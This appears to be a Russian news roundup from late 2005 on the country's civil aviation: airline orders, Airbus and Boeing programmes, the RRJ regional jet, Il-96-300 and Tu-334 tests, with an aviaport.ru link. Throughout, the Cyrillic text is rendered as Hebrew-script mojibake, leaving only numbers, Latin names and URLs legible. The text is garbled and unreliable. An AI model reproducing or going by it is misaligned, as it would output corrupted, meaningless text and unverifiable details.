׳ 2005 ִַֿױ ־ֵ ֱ׳ֵֹֹּׂ׃״. םֵײִױ װֵֽ ֻֿ־׃ֱֳִֹֹּֿׁ - ִֵֹ־׃װ׳ֵ־־ ׃׀ֿ׃ֲֿ ׳ײֹװ״ ־ֱ ׂ־ֵֻ ִּׁ ֿׂ׃׃ֹ׃ָֹֻ ֱ׳ֱֹֻֽֿ׀ֱ־ֹ ׳ ױ׃ּֿ׳ָֹׁ ִַַֿֿֿֿׂ ְֵַַֿֿׂ ֹ ֹ־ֵֿ־־ֿ װֵָ־ֹֹֻ.תֱװֿ ׳ 2005 ִַֿױ עֿ׃׃ֹֹ ױֱִּֿ׃״ ׀ֿׂ׳ֵ׃װֹ ׃ֱֽ ֲּֿ״ֿ ֱ׳ֱֹֻֿ׃ֵֹֽ׃ֹֻ ׃ֱּֿ־ ֱ ׳׃ְ ֹ׃װְֹֿׂ - םבכף-2005 ׳ ׀ִֽֿֿ׃ֻֿ׳־ֽֿ צױֻֿ׳׃ֻֽֿ. ףֱּֿ־ ׃ֱֲּֿׂ ׀ִֵׂ׃װֱ׳ֹװֵֵּ ֲֵֵּֿ ֵֽ 600 ֻֽֿ׀ֱ־ֹ ֹ 40 ׃װֱׂ־.נֿ װֽֿױ ׀ֱֱֻֿװְֵּ םבכף ױײֵ ֽֿײ־ֿ ׃ֱׂ׳־ֹ׳ֱװ״ ׃ ֻׂױ׀־ֵֹֹֽ ׃ֱּֿ־ֱֹֽ ׳ לֵ-גױׂײֵ (זֱׂ־ֳֹׁ), ׳ הױֱֲֵ (ןב), זֱׂ־ֲֿֿׂ (קֲֵֹֹֻּֿׂװֱ־ֹׁ).מֵ ׀ּֿױֹּֿ׃״ װּֿ״ֻֿ ׃ֱִֵּװ״ ֱ׳ֱֳֹֹֿ־־ױְ ֱֻֽׁׂׂױ ׳׃ֵֹֽׂ־ֿ. ק צױֻֿ׳׃ֹֻ ׀ֱֵָֹֹּׂ װּֿ״ֻֿ ׀ֹֿׂ׳ִֹֿװֵֹּ, ֻֿװֵֿׂ ֲֹּ ֱֹ־װֵֵׂ׃ֿ׳ֱ־ ׳ ׃ֿװׂױִ־ֵֹ׃װ׳ֵ ׃ עֿ׃׃ֵֹ. ק ֹװֵַֿ ֱ ׀ׁװ״ ִ־ֵ ֱ׳ֱֹ׃ֱּֿ־ֱ ׳ צױֻֿ׳׃ֻֽֿ ֲֹּ ְֱֵֻּ־ ֻֿ־װֱֻׂװ ־ֱ ֲֿױְ ׃ױֽֽױ $4 ִּֽׂ, ױֹװ׳ֱׁ ׀ִֵׂ׳ֱֹׂװֵּ״־ֵ ׃ֱֵַּֿ־ֹׁ. מֱ ֱ׳ֱֹ׃ֱּֿ־ֵ ׳ הױֱֲֵ ׳ ־ֲֵֿׁׂ 2005 ֱִַֿ ֻֿ־װֱֻׂװ ֲֹּ ְֱֵֻּ־ ־ֱ ׃ױֽֽױ $25 ִּֽׂ. י ֵ׃ֹּ ׳ הױֱֲֵ ׃ֹּֿֿׂ׳ֱֹּ ׳ ֿ׃־ֿ׳־ֽֿ װֱֵֹֻ ֹֽֿׂ׳ֵ ֱַַֹ־װ, ֱֻֻ Airbus ֹ Boeing, װֿ ׳ צױֻֿ׳׃ֻֽֿ ֿ־ֹ ֲֹּ ־ֱֵֵֽװ־: ֲּֿ״ֵ ׳׃ֵַֿ ֻֿ־װֱֻׂװֿ׳ ְֱֱֹֻּּ "יּ״ְֹ־ ֶֹ־ֱ־׃" - ׀ֲֹֹֹּׂװֵּ״־ֿ ־ֱ $1,6 ִּֽׂ. "י ׳׃ֵ-װֱֹֻ װֱַֻֿֿ ׃ֹּ״־ַֿֿ ׃ֱּֿ־ֱ ׀ֿ ֲֹ־ֵ׃-׃ֿ׃װֱ׳ְֵּׁ ֵֵ ־ֵ ֲּֿ", - ֱֱֵֵֽװ ֱ־ֱֹּװֹֻ דֵ־װֱׂ ֱ־ֱֱֹּ ׃װֱׂװֵַֹ ֹ װֵָ־ַֹּֿֿ כֿ־׃װֱ־װֹ־ םֱֵֹֻ־ֻֿ.לֵװֽֿ, ׃ֱׂױ ׀ֿ׃ֵּ ֱ׳ֱֹ׃ֱּֿ־ֱ, ׳׃ְ ֿװֱׂ׃ּ״ ׀ֿװׁׂ׃ ׃ֱֻ־ֱִּ ׃ ֱ׀ֵׂװֽֿ ־ֱ ׀ֵּֿװ יּ-96-300.ם־ֵ־ֹׁ ֱ־ֱֹּװֹֻֿ׳ב־ֱֹּװֹֹֻ, ֿ׀ֵֿׂ־־ֵ "חֱֵװֿ.Ru", ־ֵ ׃ֹװְֱװ ױִָֹֿׁ ִַֿ ױֱִ־ֽ ׀ֿ ֽ־ַֹֽֿ ׀ֹֹׂ־ֱֽ."מֵװ ִֵֹ־ֿ ׀ֹּֿװֹֹֻ, ֱֵֹֻֻ ׃ֱֵּֽֿװ ֱֱֱֲׂׂװ׳ֱװ״, ֱֵֹֻֻ ׀ִִֵֿׂײֹ׳ֱװ״. ק ֹװֵַֿ ׀ִֿׂױֻװֱ ־ֵװ, ֱ ֵ׃װ״ װּֿ״ֻֿ ֻֿ־ֻױֵׂ־װ־ֱׁ ֲֿׂ״ֱֲ, ֻֿװֱֿׁׂ ֱֵֵֽװ ֱ׳ֱֹ׀ֽֿׂױ. קֽֿֿײ־ֿ, ׳ 2006 ִַֿױ ֿװ ׃ּֿ׳ ׀ִֵֵׂױװ ֻ ִֵּױ", - ׃ֹװֱֵװ יּ״ׁ םֱֱֻֿׂ׳ ֹ "ב־װֱ־װ כֱ׀ֹװֱּ"."צֱִֹּ ֲּֿ״ֵַֿ, - ׀ִֿװ׳ֵׂײֱִֵװ םֱֹׂ־ֱ בֵֻּ׃ֵֵ־ֻֿ׳ֱ ֹ "עֵ־ֵ׃׃ֱ־׃ כֱ׀ֹװֱֱּ". - נֵֹֽׂ װֿ ֿײֱִֹ־ֵֹ ֱװׁ־ױּֿ׃״. י װֿ ׀ֹׂ װֽֿ, װֿ ױ ֿװֱׂ׃ֹּ ֲּֿ״ֿ ׀ֿװֵ־ֱֳֹּ"."נֱֻׂװֵֹ׃ֹֻ ׳ ֱֲּֿ׃װֹ ֱ׳ֱֹ׀ֵּֽֿׂ־־ֿ׃װֹ ־ֵַֹֿ ׃ֵׂ״ֵ־ַֿֿ ֱ ִַֿ ־ֵ ׀ֹּֿֿֿׂ", - ֿװֱֵֵֽװ ִֵֹֻׂװֿׂ ֻֿ־׃ֱּװֹ־ַֿ׳ֿ ֻֽֿ׀ֱ־ֹֹ Infomost גֹֿׂ׃ עֱֲֻ."טֿװֵּֿ׃״ ֲ ֲּֿ״ֵַֿ, ־ֿ ֹ ֵׂױּ״װֱװ ֵֿ׳ִֹ־. חֿ׃ױֱִׂ׃װ׳ֿ ׀ֿ׳ֵׂ־ױּֿ׃״ ֻ ֱ׳ֱֹ׀ֽֿׂױ. ק ׀ֿ׃װ׃ֿ׳ֵװ׃ֵֻֿ ׳ֵֽׁׂ ֵֵ ־ֱִַֹֻֿ ׃װּֿ״ֻֿ ׳־ֱֹֽ־ֹׁ ־ֵ ֲּֿ ־ֹ ׀ֿ ִֵ־״ֱַֽ, ־ֹ ׀ֿ ֱֹּׂ־ֽ ׀ֵֻֿׂװֱֽ ֹ ׀ֱּ־ֱֽ ֱׂ׳ֹװֹׁ", - ױ׳ֵֵׂ־ כֿ־׃װֱ־װֹ־ םֱֵֹֻ־ֻֿ ֹ דֵ־װֱׂ ֱ־ֱֱֹּ ׃װֱׂװֵַֹ ֹ װֵָ־ַֹּֿֿ. נִֵֵֹׂ־װ׃ֹֻ ׃ֱֵּֽֿװ, ֱ װֱֻײֵ ֵֵ 12 ֱּ־ֵֿׂ׳ ֿׂ׃׃ֹ׃ָֹֻ ֱ׳ֱֹֻֽֿ׀ֱ־ֹ ׳׃װֱֹּ ֲֵֵּֿ ֵֽ ־ֱ ֵֽ׃ֳׁ. כֱֻ ׃װֱּֿ ֹ׳ֵ׃װ־ֿ ׀ִֿ־ֵֵ, ֵֹֽ־־ֿ ֱִֹֽ־ֹ׃װֱֳֹׁׂ ׀ִֵֵֹׂ־װֱ ׀ֵֵׂ׃װֱָֿׂ׳ֱֱּ׃״ ֹ ׀ֿ׳ֱֹּּׁ ־ֱ ֵֵׂ־ֵֹ עֿ׃װֱׂ־׃־ֱֱִֿׂ ֱ׀ֵׂװֹװ״ ׀ֵּֿװ יּ-96-300. װֿ ׀ֹּֿֿֿׂ ׀ֿ׃ֵּ װַֿֿ, ֱֻֻ ׳ ־ֱֱֵּ ֱ׳ַױ׃װֱ קֱִֹֹּֽׂ נױװֹ־, ־ֱִָֹֿ׳ֹ׃ׁ ׃ ֱֳֶֹֹּֿ״־ֽ ׳ֹֹװֽֿ ׳ זֹ־ּׁ־ִֹֹ, ־ֵ ׃ַֽֿ ׳ֵּװֵװ״ ֹ ֱֿׂ׀ֿׂװֱ פױֻׂױ ֹ ֲּ ׳־ױײִֵ־ ׀ֵֵׂ׃ֵ׃װ״ ־ֱ ֱ׀ֱ׃־ֿ ׃ֱֵּֽֿװ. ץ ֱּ־ֵֿׂ׳ ֲֹּ ׳ׁ׳ֵּ־ ־ֱׂױֵ־ֹׁ װֽֿֿׂ־ֿ ׃ֹ׃װֵֽ.ןװ ֱ׀ֵׂװֱ ׀ֿ׃װֱֱִֹּׂ ־ֵ׃ֻּֿ״ֻֿ ֿׂ׃׃ֹ׃ָֹֻ ֱ׳ֱֹֻֽֿ׀ֱ־ֹ, ׳ װֽֿ ֹ׃ֵּ "בֶּֿֿׂװ", "הִִֵֽֿֿֿ׳׃ֵֹֻ ֱ׳ֱֹֹּ־ֹֹ" ֹ "כֱׂ׃־ֿׁׂ׃ֵֹֻ ֱ׳ֱֹֹּ־ֹֹ". ק׃ֵ ֿ־ֹ ֱׂ׃׃ֱֽװֹׂ׳ֱֹּ ׳ֽֿֿײ־ֿ׃װ״ ֹ׃ֻֿ׳ ֻ ַֿ׃ױֱִׂ׃װ׳ױ ֹֹּ ֻ ׀ֹֿׂ׳ִֹֿװֵּֽׁ, ־ֿ ׳ ֹװֵַֿ ֿװֱֱֹֻּ׃״ ֿװ ־ֱֵֵֽׂ־ֹׁ ׳ֵֽֿ׃װֹװ״ ׀ֿװֵֹׂ.תֱ׀ֵׂװ ־ֱ ִֹֿ־ ֹ ׃ֱָֽ ־ֿ׳ָ ֿׂ׃׃ֹ׃ָֹֻ ֱַׂײֱִ־׃ָֹֻ ׃ֱֵּֽֿװֿ׳ ׳ ִֵֵֿׂ־ֿ ֱׂ ױֱִֹּׂ ׀ֿ ׀ֵׂ׃װֹײױ ֿװֵֵ׃װ׳ֵ־־ַֿֿ ֱ׳ֱֹ׀ֱֽֿׂ. חֵ־ִֵֹֻׂװֿׂ קֿֿׂ־ֵײ׃ַֻֿֿ ֱֳֹֻֿ־ֵׂ־ַֿֿ ׃ֱֵּֽֿװֿ׃װֹֿׂװֵּ״־ַֿֿ ֲֵֿ׃װ׳ֱ, ׀ֹֿׂ׳ִֹֿ׳ֵַֿ ִֵװֱֹּ ֻ יּ-96, קֵׁ׃ֱּ׳ ףֱֹֻּֿ׳ ׳־ױײִֵ־ ֲּ ױװֹ ׳ ֿװ׃װֱ׳ֻױ.נֿ׃ֵּ ׃ֱֻ־ֱֱִּ ׃ יּ-96-300 ׃ ־ֿ׳ֿ ֿ׃װֿׂװֿ ׃װֱּ ׳ֿ׀ֿׂ׃ ֿ ׀ֹּֿ־ֱָ ־ֱ ׃ֱֵּֽֿװ ֱׂױֲֵײ־ַֿֿ ׀ֹֿׂ׳ִֿ׃װ׳ֱ. מהף ֹ װֱֽֿײֵ־־ ׃ֲֿׂ ׳ֵֽ׃װֵ ׃ֿ׃װֱ׳ְּׁװ 40% ֳֵ־ ׃ֱֵּֽֿװֱ. מֿ װֿװ ׳ֿ׀ֿׂ׃ ִֿ ֻֿ־ֱֳ ֱִַֿ װֱֻײֵ ־ֵ ֲּ ֵֵׂ־.תֱ ׂױֲֵײֽֿ 2005 ִַֿ ֱ׀ֽֿ־ֹװ׃ׁ ׀ֵׂײִֵ ׳׃ֵַֿ ַֿ־ֻֿ Airbus ֹ Boeing ׳ ֱֲּֿ׃װֹ ֱִּ״־ֱֵַֹֽ׃װֱּׂ״־ָ ׃ֱֵּֽֿװֿ׳. Airbus ׀ֱֱִֵֵַּׂװ A350 - ֻֿ־ֹֽֿ־ ֱּ־ֵׂ, ־ֿ ֿ־ ׃ֿ׳ֵֹׂװ ׀ֵׂ׳ ׀ֵּֿװ װּֿ״ֻֿ ֻ 2010 ִַֿױ. Boeing ֱֲֵֵֿװ ֻ װֽֿױ ׳ֵֵֽׂ־ֹ ױײֵ ־ֱֱװ״ ׀ֱִֿׂ׳ֱװ״ B787 - Dreamliner. גֿׂ״ֱֲ ִֵֹװ ֹ ׀ֿ ־ֱֲֵֵֹּֿ ׳ֵֽ׃װֹװֵּ״־ֽ ׃ֱֵּֽֿװֱֽ - A380 ֹ Boeing 777-200LR Worldliner. נֵׂ׳ ׳ 2005 ִַֿױ ׀ֵּֿׂ ֹ׃׀װֱװֵּ״־ֵ ׀ֵּֿװ ֹ ׃ֱֽֿ׃װֿׁװֵּ״־ֿ ׀ֵֹּׂװֵּ ׳ הױֱֲ. קװֿֿׂ 10 ־ֲֿׁׁׂ ױ׃װֱ־ֿ׳ֹּ ִֵֻֿׂׂ ׀ֿ ֱִּ״־ֿ׃װֹ ׀ֵּֿװֱ ׀ֱ׃׃ֱײֹׂ׃ַֻֿֿ ׃ֱֵּֽֿװֱ ֲֵ ֱִֿ׀ֱׂ׳ֹֻ, ׀ֵֵֵּׂװֵ׳ ֹ חֿ־ֻֿ־ֱַ ׳ לֿ־ִֿ־. ק עֿ׃׃ֹֹ ֱ׳ֱֹֻֽֿ׀ֱ־ֹֹ ׀ֱֻֿ ־ֵ ְֱֵׂװ׃ׁ ־ֱ ׳ֲֿׂ ֵֽײִױ ֱַַֹ־װֱֹֽ ֹֽֿׂ׳ַֿֿ ֱ׳ֱֹ׃װֹֿׂװֵּ״׃װ׳ֱ. נֿ ֱִ־־ֽ, ׀ֿׁ׳ֹ׳ֹֽ׃ׁ ׳ ֻֿ־ֳֵ ֱֲִֵֻׁׂ, "בֶּֿֿׂװ" ֲֹּײֵ ֻ ׳ֲֿׂױ Boeing 787, ־ֵײֵֹּ A350.הׂױַֹֽ ־ֱֹֽֽ ִּׁ ֿװֱׂ׃ֹּ ׃ֲֿװֵֹֽ ׃װֱּֿ װֿ, װֿ ׳ ־ֱֱֵּ ֱֲִֵֻׁׂ ֲּ ׀ִֿ׀ֹ׃ֱ־ ׀ֵׂ׳ ֻׂױ׀־ ֻֿ־װֱֻׂװ ־ֱ RRJ - ֿׂ׃׃ֹ׃ֹֻ ֵַֹֿׂ־ֱּ״־ ׃ֱֵּֽֿװ, ֱֱֱֲׂׂװ׳ֱֵֽ בטכ "ףױָֿ" ֹ ׀ּֿױֹ׳ֹ ׀ִִֵֿׂײֻױ ַֿ׃ױֱִׂ׃װ׳ֱ. "בֶּֿֿׂװ" ׃ֱַּֿ׃ֹּ׃ׁ ֻױ׀ֹװ״ 30 ֲֹּײ־ֱֵַֹֽ׃װֱּׂ״־ָ ׃ֱֵּֽֿװֿ׳ ׀ֹֿׂ׳ִֿ׃װ׳ֱ "ףױַָֿֿ" ֵֵׂ זֹ־ֱ־׃ֿ׳ױְ ֹֹּ־ַֿ׳ױְ ֻֽֿ׀ֱ־ְֹ. נֱׂ׳ֱִ, ֹ ִֵ׃״ ֲּֿֿֿ׃״ ־ֵ ֲֵ ׃ֱֻ־ֱֱִּ: ִֵ׀ױװֱװ חֿ׃ִױֽ בֵֻּ׃ֱ־ִׂ לֲִֵֵֵ׳, ֻֿ־װֹּֿׂׂױְֹ ֻּֿֿֿ 30% ֱֳֹֻ "בֶּֿֿׂװֱ" ֵֵׂ מֱֳֹֿ־ֱּ״־ױְ ֵֵׂׂ׳־ױְ ֻֿׂ׀ְֱֳֹֿׂ, ׀ֱֲֵּֿֿ ׳׃ֵֹֽ ׳ֽֿֿײ־ֹֽ ׃׀ֿ׃ֱֲֹֽֿ ֱֲֹֻּֿֿׂ׳ֱװ״ ׃ִֵֻּױ ׳ ֹ־װֵֵׂ׃ֱָ ִׂױַַֿֿ ֲֹּײ־ֱֵַֹֽ׃װֱּׂ״־ַֿֿ ׃ֱֵּֽֿװֱ - ב־-148 ֿװ "ב־װֿ־ֿ׳ֱ".װֿװ ײֵ ׃ֱֵּֽֿװ ׀ֿ־ֱׂ׳ֹּ׃ׁ ֹ ׂױֻֿ׳ִֹֿװְֵּ ִׂױַֿ ֿׂ׃׃ֹ׃ֻֿ ֱ׳ֱֹֻֽֿ׀ֱ־ֹֹ - "כֱׂ׃ׂ". פֱֽ ׀ֿ׃ֹװֱֹּ, װֿ ױײֵ ׀ֿ׃װֵֿׂ־־ ׃ֱֵּֽֿװ ּױֵ ־ֵ׀ֿ׃װֵֿׂ־־ַֿֿ, ֹ ׀ִֵׂ׀ֹּֿ ֻױ׀ֹװ״ ִֵ׃ׁװ״ ב־-148 ֹ ׀ֱֻֿ ׳ִֵֿׂײֱװ״׃ׁ ֿװ RRJ. מֿ ַֿ׃ױֱִׂ׃װ׳ֿ ׁ׃־ֿ ֱִּֿ ׀ֿ־ׁװ״, ֱַֻֻֿֿ ֹ ׀ֵׂװֵ־ִֵ־װֿ׳ ֿ־ֿ ׀ִִֵֿׂײֹ׳ֱֵװ. ק ֻֿ־ֳֵ ֱֲִֵֻׁׂ ֹ׃װֿ־ֹֹֻ ׳ עֿ׃ֹֽױֵ׃װ׳ֵ, ֿ׃־ֿ׳־ֽֿ ֱֳֹֻֿ־ֵֵׂ "כֱׂ׃ׂ", ֱִֹּ ׀ֿ־ׁװ״, װֿ ֱִֵֵֶּׂ״־ֵֿ ֱֵַ־װ׃װ׳ֿ ֱֲֹֻּֿׂױֵװ ׃ִֵֻּױ. - - - - - מֿ׳ֿ׃ֲֹֹׂ׃ֵֻֿ ֱ׳ֱֹ׃װֵֿׂ־ֵֹ: ׃ֿ׳ֵֵֽׂ־־ֱׁ עֿ׃׃ֹׁ ֹ ֵֵ ־ֲֵֵ׃־ ֱֹװ־ֹֻ ִֹֹּֿׂ׃״ ׀ִֿ ִֿ־ֿ ׳ִֵֿ - http://www.aviaport.ru/news/2005/12/29/99256.html - ק ֱֲִֵֵֻׂ 1993 ַ. ׀ֵׂ׳ ׀ֵּֿװ ׃ֿ׳ֵֹּׂ ֶֿׂ־װֿ׳ֿ ֱֲֲִֹֽֿֿׂׂ׳ֹֻ ֵװ׳ֵׂװַֿֿ ׀ֵֻּֿֿ־ֹׁ ףױ-34. ןֲ װֽֿ ֹ ִׂױַָֹ ׃ֲֿװָֹׁ ֱׂ׃׃ֱֻ׳ֱֵװ ֵַ־ִֵֹֻׂװֿׂ מבנן ֹֽ. ק.נ. ‏ֱֻּֿ׳ֱ ב. גֲֵֿׂ׳ - Thu, 29 Dec 2005 16:27:00 +0300 - ק ֱִֵֻּֽֿ ֱֲִֵֵֻׂ 1993 ֱִַֿ ׃ֿ׳׀ֱֹּ ִ׳ֱ ׃ֲֿװֹׁ: ־ֱ ׀ֹּֿװֵֹ׃ֻֿ ֱֻׂװֵ ֱֹֽׂ ׀ֿׁ׳ֱֹּ׃״ ־ֿ׳ֱׁ ׃ױ׳ֵֵׂ־־ֱׁ ׃װֱׂ־ֱ ׀ִֿ ־ֱ׳ֱ־ֵֹֽ עֿ׃׃ֹׁ, ֱ ׳־ױװֹׂ ֵֵ, ׳ ׃װֳֵֹּֿ ףֲֹֹֹׂ, ׃ ֵּװ־ַֿֿ ׀ּֿׁ ֱ׳ֱִֿ ֹֽ. ק.נ. ‏ֱֻּֿ׳ֱ ׳ּֽ ׳ ׀ֵׂ׳ ׃׳ֿ ׀ֵּֿװ װּֿ״ֻֿ װֿ ׃ֱֲֿׂ־־ ֶֿׂ־װֿ׳ֿ ֱֲֲִֹֽֿֿׂׂ׳ֹֻ ֵװ׳ֵׂװַֿֿ ׀ֵֻּֿֿ־ֹׁ ףױ-34. חֿ׃ױֱִׂ׃װ׳ֿ ֹ ִֹֿ־ ֹ ׃ֱָֽ ַֿׂ־ָ ֱ ׳׃ְ ֹ׃װְֹֿׂ ׳ֵֿ־־ֿ ֱ׳ֱֳֹֹֹ ׃ֱֵּֽֿװֿ׳ ִֹֹּֿׂ׃״ ִֿ־ֿ׳ֵֵֽׂ־־ֿ, ׀ִֿ ִֿ־ֿ ׳ִֵֿ. כֱֻ ֲױִװֿ גַֿ ֱֲַּֿ׃ּֿ׳ֹּ עֿ׃׃ְֹ, ֱִֿׂ׳ֱ׳ ׳ ֵֽֽֿ־װ ֵֵ ֿׂײִֵ־ֹׁ ־ֲֵֵ׃־ַֿֿ ֱֹװ־ֱֹֻ, ֻֿװֿׂ ֲױִֵװ ֱׂ׳ֹ׳ֱװ״׃ׁ ֹ ֱׂ׃װֹ ׳ֵֽ׃װֵ ׃ֿ ׃װֱׂ־ֿ.ןֲ װֽֿ ֹ ֿ ִׂױַָֹ ־ֱֵֽ־ֱװֵּ״־ָ ׃ֲֿװָֹׁ ֿׂ׃׃ֹ׃ֻֿ ֹ׃װֹֹֿׂ ֱׂ׃׃ֱֻ׳ֱֵװ ָֹ ־ֵ׀ֿ׃ִֵׂ׃װ׳ֵ־־ ױֱ׃װ־ֹֻ, ֵַ־ֱֵּׂ״־ ִֵֹֻׂװֿׂ מֿ׳ֿ׃ֲֹֹׂ׃ַֻֿֿ ֱ׳ֱֹ׃װֹֿׂװֵּ״־ַֿֿ ׀ֹֿׂ׳ִֿ׃װ׳ֵ־־ַֿֿ ֲִֵֹֿ־ֵ־ֹׁ ֹֽ. ק.נ. ‏ֱֻּֿ׳ֱ בֵֻּ׃ֱ־ִׂ גֲֵֿׂ׳.- חֱּ׳־ֽ ׃ֲֿװֵֹֽ ִּׁ ֱֲֿׂװ־ֹֻֿ׳ מבנן ֹֽ. ק.נ. ‏ֱֻּֿ׳ֱ ׳ ױִֵָֽֿׁ ִַֿױ ׃װֱּֿ ִַּֿֿײֱִ־־ֵֿ ׳ְֵֻּ־ֵֹ ־ֱֵַֿ ־ֿ׳ַֿֿ ׃ֱֵּֽֿװֱ ףױ-34 ׳ ַֿ׃ױֱִׂ׃װ׳ֵ־־ ֱֱֻ. װֿ ־ֱֹװ, װֿ, ־ֱֹ־ֱׁ ׃ ־ֿ׳ַֿֿ 2006 ֱִַֿ, ֱ׳ִֿ ׃־ֿ׳ֱ ֲױִֵװ ׀ֹֿׂ׳ִֹֿװ״ ׃ֵֹׂ־ױְ ֲֵֿ׳ױְ װֵָ־ֹֻױ. נֵֹֽׂ ֲֵֽֿ ׀ֹֿׂ׳ִֿ׃װ׳ֱ ִַֿ ֿװ ֱִַֿ ֲױִױװ ֱׂ׃װֹ.ם 12 ֵּװ ׀ֲֹֹּׂײֱֹּ װֿװ ִֵ־״, ׀ֿ׃ִֵּֿ׳ֱװֵּ״־ֿ "׃־ֿ׃ֹ׳" ־ֱ ֵּװ־ָ ֹ׃׀װֱװֵּ״־ָ ׀ֵּֿװֱָ ׳ֿ׃ֵֽ״ ֿ׀װ־ָ ֱֲֳֿֿׂ׳ ףױ-34. עֱֲֿװ ׀ֿ ׃ֿ׳ֵֵׂ־׃װ׳ֿ׳ֱ־ְֹ ׃ֱֵּֽֿװֱ ־ֵ ֿ׃װֱ־ֱ׳ֹּ׳ֱֹּ׃״ ֱִײֵ ׳ ׃ֱֵֽ ׃ּֿײ־ֵ ִּׁ ֱ׳ֱִֿ ׳ֵֵֽׂ־ֱ, ֱִַֻֿ ׳׃ֵ ׀ֹֿׂ׳ִֿ׃װ׳ֿ ֱֱֹּֽֿׂ ֹ ־ֵ ֲּֿ ׃ִֵׂ׃װ׳ ־ֹ ־ֱ ֱׂ׀ֱּװױ, ־ֹ ־ֱ ֵֻּװֿׂ־ְֵַֹׂ. מֵ װּֿ״ֻֿ ֻֿ־ֵֹֽֿ׃ֵֹֻ ־ֵ׳ִַֿ װֲֵֿׂ׳ֱֹּ ֿװ ֵֻֻּּֿװֹ׳ֱ מבנן ֹֽ. ק. נ. ‏ֱֻּֿ׳ֱ ֱֲֳֹֹֹֹּֽֿ ׳׃ֵָ ׃ֹּ - ׳ ׂױֻֿ׳ִֿ׃װ׳ֵ ׃װֱׂ־ ־ֵ ֲּֿ ִֵֹ־ַֿֿ ֽ־ֵ־ֹׁ ֿ ׃ױִ״ֲֵ װַֿֿ ׀ֵֻֿׂװֱ. קֿ ׳׃ֻֽֿׁ ׃ּױֱֵ, ִֿ ֻֿ־ֱֳ 90-ָ ־ֹֻװֿ ־ֵ ַֽֿ ׃ֱֱֻװ״ ֿ׀ִֵֵֵּׂ־־ֿ, װֿ ףױ-34 ֲױִֵװ ׳ְֵֻּ־ ׳ ׀ֱּ־ ׀ֵֵׂ׳ֿֿׂױײֵ־ֹׁ קקף, ֹ ־ֱֽ ֿ׃װֱ׳ֱּֿ׃״ װּֿ״ֻֿ ִֿ־ֿ: ׳ֵֹׂװ״ ׳ ־ֱֵ ִֵװֵֹ.ם ױ׀ֿׂ־ֿ ׀ִּֿֿׂײֱֹּ ֱֲֿׂװֱװ״ ֹ ׀ֲִֵֹֹּֿ. 13 ֱ׳ַױ׃װֱ 2005 ֱִַֿ ֹֽ־ֹ׃װׂ ֲֿֿֿׂ־ ׀ֹׂ־ּׁ ֵֵׂ־ֵֹ ׳ְֹֻּװ״ ףױ-34 ׳ ַֿ׃ױֱִׂ׃װ׳ֵ־־ ֱֱֻ, װֵֽ ׃ֱֽֽ ׀ִֿ׳ִֵׁ ֹװַֿֿ׳ױְ ֵׂװױ ׀ִֿ ֵׂױּ״װֱװֱֹֽ ׳׃ֵָ ֹ׃׀װֱ־ֹ - ֹ ֱֹֽ־, ֹ ְִֵּ…קװֽֿׂ ׀ֿ ־ֱֹֽֿ׃װֹ ׃ֲֿװֵֹֽ ױִֵַָֿֿׁ ֱִַֿ ׁ ֲ ־ֱ׳ֱּ ׃ֱִֿ־ֵֹ מֿ׳ֿ׃ֲֹֹׂ׃ַֻֿֿ ֱֱֶֹֹּּ תבן "חֱׂײֱִ־׃ֵֹֻ ׃ֱֵּֽֿװ ףױַָֿֿ", ֻֿװֵֿֿׂ ֿ־ֱֵֽ־ֿ׳ֱּֿ ׃ֲֿֿ ְִֵֹֹׂ׃ֵֻֿ ֵֶּֽֿֿׂ־ֵֹ ׀ֱּ־ֿ׳ ׃װֹֿׂװֵּ״׃װ׳ֱ ־ֿ׳ֵֵַֿ ֱַׂײֱִ־׃ַֻֿֿ ׃ֱֵּֽֿװֱ RRJ ("עֱ־ עֵַֹֿ־ הײֵװ" - עױ׃׃ֹֻ עֵַֹֿ־ֱּ״־ ףֱֵּֽֿװ). װֿװ ׀ֵֻֿׂװ ׀ֹׂ׳ֱ־ ׀ִִֵֿׂײֱװ״ ׃װֱװױ׃ ־ֱֵ ׃װֱׂ־ ׳ ֱַׂײֱִ־׃ֻֽֿ ׃ֱֵּֽֿװֿ׃װֵֿׂ־ֹֹ. מֱ ־ֱֵֽ ׀ִֵׂ׀ֹׁׂװֹֹ ׳ ֻֿֿ׀ֱֳֵֹֹׂ ׃ ֱ׳ֱֹ׃װֹֿׂװֵֹּֽׁ ֹ כֽֿ׃ּֽֿֿ״׃ֱֻ-־ֱ-בֽױֵׂ ֲױִֵװ ׀ֹֿׂ׳ִֹֿװ״׃ׁ 95-ֵֽ׃װ־ ׳ֱֱֹׂ־װ ׃ֱֵּֽֿװֱ. ם װֱֻײֵ ֲױִֵֽ ױֱ׃װ׳ֿ׳ֱװ״ ׳ ׃ֱִֿ־ֹֹ 60- ֹ 75-ֵֽ׃װ־ָ ֱֹֽ־.נֱ׃׃ֱײֹׂ׃ֹֻ ֱּ־ֵׂ - ִֵּֿ ִּׁ מבנן ֹֽ. ק.נ. ‏ֱֻּֿ׳ֱ ־ֿ׳ֵֿ ֹ ׀ֿװֽֿױ ֿװ׳ֵװ׃װ׳ֵ־־ֵֿ: װׂױִֿ׳ֽֿױ ֵֻֻּּֿװֹ׳ױ ׀ִֵׂ׃װֹֿװ ֿ׃׳ֹֿװ״ ־ֿ׳ֵ װֵָ־ַֹֹּֿֿ ֹ ֱֶֻװֵֹ׃ֹֻ ׀ֵֵׂװֹ ־ֱ ־ֿ׳ ױֿׂ׳ֵ־״ ׀ֹֿׂ׳ִֿ׃װ׳ֱ. ץײֵ ־ֱֱֱּ׃״ ֵֻֿׂ־׃װׂױֳֹֻׁ ׃ֲֿֿׂ־ַֿֿ ֱֳֵָ, ׃ֱִֿ־ֿ ־ֿ׳ֵֿ ׀ֱִִֵֵּֿׂ־ֵֹ ׳׃ֻֿֿ׃ֻֿֿׂ׃װ־ֿ ֱֲֲֿֿׂװֹֻ ֵֽװֱֱּּ, ׳־ְִֵׁׂװ׃ׁ ִׂױֵַֹ װֵָ־ֵַֹּֿֿ׃ֵֹֻ ־ֿ׳ֵ׃װ׳ֱ. יװַֽֿֿ ׳׃ֵֽױ ִּֿײֵ־ ׃װֱװ״ 2007 ִַֿ, ֱִַֻֿ ׀ֱּ־ֹׂױֵװ׃ׁ ־ֱֱװ״ ֵּװ־ֵ ֹ׃׀װֱ־ֹׁ ׀ֵׂ׳ָ ֱֲֳֿֿׂ׳ RRJ.מֿ׳ ׃ֱֵּֽֿװ ױײֵ ֿײְֱִֹװ ׳ ֿׂ׃׃ֹ׃ָֹֻ ֱ׳ֱֳֹֹֿ־־ָ ֻֽֿ׀ֱ־ָֹׁ, ֻֿװֵֿׂ ױײֵ ׳ֱׂײְֱװ ַֿװֿ׳־ֿ׃װ״ 